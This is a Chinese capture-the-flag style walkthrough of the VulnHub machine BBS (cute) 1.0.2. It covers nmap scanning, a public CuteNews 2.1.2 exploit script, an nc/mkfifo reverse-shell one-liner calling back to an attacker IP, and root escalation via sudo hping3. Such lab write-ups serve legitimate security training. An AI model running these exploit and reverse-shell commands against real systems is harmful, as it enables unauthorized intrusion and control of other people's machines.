BBS (CUTE): 1.0.2靶机渗透 – 作者:WAFmax

基础信息

靶机链接:https://www.vulnhub.com/entry/bbs-cute-102,567/
难度:简单->中级
发布日期:2020/9/24
目标:获取root权限
描述:
机器名称:BBS(公告板系统)
Description:真正的技术机器,如果您准备进行认证,它将是测试自己的好工具。您会发现一种非常罕见的最终利用技术,这是您以前从未见过的!

前言

本次靶机使用的VM VirtualBox进行搭建运行,将kali与靶机一样使用Host-only模式。本次演练使用kali系统按照渗透测试的过程进行操作,本次渗透从信息收集到提权思路清晰没有比较坑的地方,主要是脚本的利用需要查找资料知道使用方法。

一、信息收集

1.ip

nmap 192.168.56.0/24

使用nmap进行扫描,得到ip地址:192.168.56.108
图片.png

2.靶机端口与服务

nmap -sV -p- -O -A 192.168.56.108

图片.png

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
88/tcp  open  http     nginx 1.14.2
110/tcp open  pop3     Courier pop3d
995/tcp open  ssl/pop3 Courier pop3d

3.网站信息收集

访问192.168.56.108
这是一个Apache的页面
除此之外没有可利用的信息
图片.png

二、漏洞探测与漏洞利用

1、脚本利用

使用dirb进行网址扫描
发现登录页面

http://192.168.56.108/

图片.png

查看该版本是否有存在的漏洞

searchsploit CuteNews 2.1.2

图片.png

cp /usr/share/exploitdb/exploits/php/webapps/48800.py /root

注:48800.py想要正常运行需要将CuteNews删除
图片.png
2、反弹shell

运行48800.py获取临时权限

python3 ./48800.py
 

图片.png
使用nc监听端口获取shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 1234 >/tmp/f

图片.png

三、提权

1、升级成交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

图片.png

2、sudo -l提权

使用sudo -l 发现该用户可执行的命令

/usr/sbin/hping3 --icmp

图片.png先执行尝试一下看看能否直接提权
图片.png根据提示,搜索hping3命令的信息,与使用方式
链接:https://www.cnblogs.com/zlgxzswjy/p/14115306.html

执行命令获取root权限
图片.png查看flag
图片.png

总结

从信息收集到反弹shell不是很难只需要查找相应脚本的使用方法,提权的时候遇到没有见过的命令要活用谷歌进行搜索,有助于我们更好的提权。

来源:freebuf.com 2021-02-23 16:45:14 by: WAFmax

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论